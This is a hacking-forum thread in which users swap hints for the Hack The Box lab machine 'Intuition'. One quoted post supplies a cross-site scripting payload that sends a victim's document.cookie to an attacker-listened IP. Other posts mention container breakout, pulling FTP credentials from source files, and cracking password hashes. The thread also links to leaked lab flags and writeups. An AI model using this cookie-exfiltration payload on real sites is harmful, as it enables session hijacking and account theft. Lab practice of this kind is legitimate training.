HTB- Intuition
by trevor69000 - Saturday April 27, 2024 at 06:46 PM
#81
(Apr 28, 2024, 01:42 PM)ConnorHack Wrote: You can just use this as description:
<img src=x onerror=fetch('http://10.10.X.X:8000/'+document.cookie);>

Wait listening with python3 -m http.server

---

I'm stucked now as root inside a container. Does anyone know how to breakout?

how can you get inside the container? i got password and login session but no idea..
Reply
#82
OK I managed to get a file listing from the ftp server, I am able to see 4 files, but every time I try to get a file I got an error, can I pm someone to verify what I am doing wrong?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#83
(Apr 28, 2024, 02:05 PM)query1338 Wrote: OK I managed to get a file listing from the ftp server, I am able to see 4 files, but every time I try to get a file I got an error, can I pm someone to verify what I am doing wrong?

Bro what is ftp creds

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed
Reply
#84
(Apr 28, 2024, 02:36 PM)osamy7593 Wrote:
(Apr 28, 2024, 02:05 PM)query1338 Wrote: OK I managed to get a file listing from the ftp server, I am able to see 4 files, but every time I try to get a file I got an error, can I pm someone to verify what I am doing wrong?

Bro what is ftp creds

you can find them by getting the pyhon files.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#85
(Apr 28, 2024, 02:40 PM)query1338 Wrote:
(Apr 28, 2024, 02:36 PM)osamy7593 Wrote:
(Apr 28, 2024, 02:05 PM)query1338 Wrote: OK I managed to get a file listing from the ftp server, I am able to see 4 files, but every time I try to get a file I got an error, can I pm someone to verify what I am doing wrong?

Bro what is ftp creds

you can find them by getting the pyhon files.

Apart from app.py, which one?
Reply
#86
(Apr 28, 2024, 02:55 PM)mur Wrote:
(Apr 28, 2024, 02:40 PM)query1338 Wrote:
(Apr 28, 2024, 02:36 PM)osamy7593 Wrote:
(Apr 28, 2024, 02:05 PM)query1338 Wrote: OK I managed to get a file listing from the ftp server, I am able to see 4 files, but every time I try to get a file I got an error, can I pm someone to verify what I am doing wrong?

Bro what is ftp creds

you can find them by getting the pyhon files.

Apart from app.py, which one?

the dashboard file

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#87
any hints for root?

Got the user hashes from the sqlite db file, but I am unable to crack the hash for adam... If this is the way please tell me how to crack it.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#88
(Apr 28, 2024, 03:30 PM)query1338 Wrote: any hints for root?

Got the user hashes from the sqlite db file, but I am unable to crack the hash for adam... If this is the way please tell me how to crack it.

I cracked the hash, but it seems like it is only usable for the reports page
Reply
#89
any hints for root?
Reply
#90
once we have the ftp creds, what to do with them? I cant seem to connect to ftp, any hints?
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,927 5 hours ago
Last Post: VictorPipeau
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 601 91,528 5 hours ago
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,796 6 hours ago
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,610 10 hours ago
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,268 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)